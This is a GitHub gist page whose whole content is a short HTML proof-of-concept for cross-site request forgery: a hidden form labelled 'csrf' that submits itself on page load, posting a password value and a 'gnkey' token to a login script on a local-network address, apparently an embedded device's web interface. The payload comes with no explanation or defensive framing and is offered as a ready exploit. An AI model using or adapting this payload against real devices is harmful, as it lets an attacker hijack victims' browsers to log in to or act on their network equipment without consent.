Skip to content

Instantly share code, notes, and snippets.

@danzajork
Created November 2, 2017 23:39
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save danzajork/e6a81b6452f553c31408f47381490087 to your computer and use it in GitHub Desktop.
Save danzajork/e6a81b6452f553c31408f47381490087 to your computer and use it in GitHub Desktop.
<html>
<body>
<form style="visibility: hidden" id="csrf" name="loginForm" action="http://192.168.0.160/cgi-bin/dologin" method="POST">
<input name="P2" type="password" value="123">
<input type="submit" name="Login" value="Login">
<input name="gnkey" type=hidden value=0b82>
</form>
<script>
document.getElementById("csrf").submit();
</script>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment